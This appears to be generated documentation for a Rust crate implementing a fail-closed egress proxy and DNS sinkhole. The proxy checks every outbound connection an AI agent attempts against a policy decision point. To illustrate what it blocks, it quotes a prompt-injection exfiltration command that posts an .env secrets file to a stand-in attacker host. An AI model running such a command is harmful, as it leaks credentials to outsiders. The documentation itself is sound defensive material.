Crate secureops_proxy

§secureops-proxy - the egress PEP (Policy Enforcement Point)

This crate is the single highest-impact enforcement component in SecureOps: it neutralizes data exfiltration regardless of how the agent was compromised (PRODUCT.md Part D headline, Part E P0). All outbound agent traffic is funneled through a local forward proxy and a local DNS sinkhole; each connection is authorized by the PDP ([secureops_policy]) before a single byte leaves the box.

§The headline path (PRODUCT.md B.5)

  1. Agent (Ring 0) attempts an outbound connection. DNS goes to the local DnsSinkhole; raw connects are routed to the local EgressProxy (transparent redirect or explicit HTTPS_PROXY).
  2. The proxy reads the SNI / requested host - no MITM, no certificate interception by default (see PeekedHost) - and asks the PDP: is this destination allowed for this process?
  3. The PDP evaluates policy + accumulated per-PID process context (e.g. “this PID openat’d a credential file 200ms ago”) and returns Decision::Allow, Decision::Deny, or Decision::Escalate.
  4. Deny => hard RST; the bytes never leave the box (0 bytes exfiltrated). Allow => the connection proceeds. Either way, exactly one entry is written to the signed audit log with the PID/host/decision attached.

Concretely, this turns the canonical prompt-injection exfil curl -d @.env attacker.com from “we’d have a log of it afterward” into “it didn’t happen” - the unknown host is hard-RST at the proxy (PRODUCT.md Part D, row 1).

§Fail-closed is the contract (PRODUCT.md W0)

The egress proxy + DNS sinkhole are the only cross-platform enforcement primitives (✓ on Linux/macOS/Windows). Kernel-level inline deny is uneven: Linux has LSM-BPF, macOS Endpoint Security is mostly observe-only, Windows uses a WFP callout. The subphase rule is therefore non-negotiable:

Where a platform can only observe, the daemon must fail-closed at the proxy rather than pretend it has kernel deny.

In this crate that means: any error, PDP timeout, PDP-unreachable, or unknown destination resolves to a hard RST / sinkholed answer - never to an open connection. See FailMode (defaults to FailMode::Closed) and EgressProxy::on_error.
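An added example, not code from this crate: a minimal sketch of the fail-closed mapping described above, in which only a definitive Allow opens a tunnel and every other outcome (Deny, Escalate, PDP error, unreadable host) is refused. `Allowlist`, `PdpError`, `Action`, `normalize` and `enforce` are hypothetical names, and `Decision` reuses the variant names listed on this page but is not the crate's real definition.

```rust
use std::collections::HashSet;

// Hypothetical stand-ins; the crate's real definitions are not shown on this page.
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum Decision { Allow, Deny, Escalate }
#[derive(Debug, PartialEq)]
pub enum PdpError { Timeout, Unreachable }
#[derive(Debug, PartialEq)]
pub enum Action { Tunnel, Refuse } // Refuse = RST / 403, upstream never contacted

/// Hypothetical allowlist PDP: exact host match, case-insensitive, trailing dot ignored.
pub struct Allowlist { hosts: HashSet<String> }

fn normalize(host: &str) -> String {
    host.trim_end_matches('.').to_ascii_lowercase()
}

impl Allowlist {
    pub fn new(hosts: &[&str]) -> Self {
        Self { hosts: hosts.iter().map(|h| normalize(h)).collect() }
    }
    /// `peeked` is None when no SNI / CONNECT host could be read off the wire.
    pub fn decide(&self, peeked: Option<&str>) -> Result<Decision, PdpError> {
        match peeked {
            Some(h) if self.hosts.contains(&normalize(h)) => Ok(Decision::Allow),
            _ => Ok(Decision::Deny), // unknown or unparseable destination
        }
    }
}

/// Fail-closed: only a definitive Allow opens the connection.
pub fn enforce(verdict: Result<Decision, PdpError>) -> Action {
    match verdict {
        Ok(Decision::Allow) => Action::Tunnel,
        Ok(Decision::Deny) | Ok(Decision::Escalate) | Err(_) => Action::Refuse,
    }
}

fn main() {
    let pdp = Allowlist::new(&["api.example.com"]); // constructed sample allowlist
    for host in [Some("API.example.com."), Some("api.example.com.attacker.example"), None] {
        println!("{:?} -> {:?}", host, enforce(pdp.decide(host)));
    }
    for e in [PdpError::Timeout, PdpError::Unreachable] {
        println!("PDP error -> {:?}", enforce(Err(e)));
    }
}
```

The exact-match comparison is what keeps a look-alike such as `api.example.com.attacker.example` from passing; a suffix or substring match on the allowlisted name would let it through.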

Structs§

AllowlistPdp
A concrete, dependency-free PolicyDecisionPoint: allow a connection only when its host is in the egress allowlist (everything else denied - fail-closed). Mirrors secureops.network.egressAllowlist (PRODUCT.md B.3 network module / B.5).
ConnectionRequest
The per-connection context handed to the PDP: who is asking, and for what.
DnsSinkhole
Local DNS authority that swallows lookups for disallowed / unknown names.
EgressProxy
Local forward proxy that authorizes every outbound agent connection.
PeekedHost
What the proxy peeked off the wire to identify the destination, without MITM (PRODUCT.md B.5 step 2: “no MITM, no cert interception by default”).

Enums§

Decision
The PDP’s verdict for a single egress attempt (PRODUCT.md B.5 step 3).
EnforcementTier
The platform’s enforcement tier, so operators don’t over-trust a weaker OS (PRODUCT.md W0 table). The proxy itself is cross-platform; what differs is whether kernel deny backs it up.
FailMode
How the PEP behaves when it cannot get a definitive Allow (PDP error/timeout, observe-only platform, malformed handshake, …).

Traits§

PolicyDecisionPoint
The slice of secureops-policy’s PDP that the egress PEP requires.

Functions§

egress_finding
Build the [AuditFinding] recorded for a single egress decision.
handle_connection
Handle one proxied connection: read the HTTP CONNECT request, ask the PDP, and either tunnel to the upstream (Decision::Allow) or refuse with 403 without ever contacting the upstream (Deny/Escalate → 0 bytes leave - PRODUCT.md B.5 step 4 / Part D row 1). Fail-closed on any error (W0).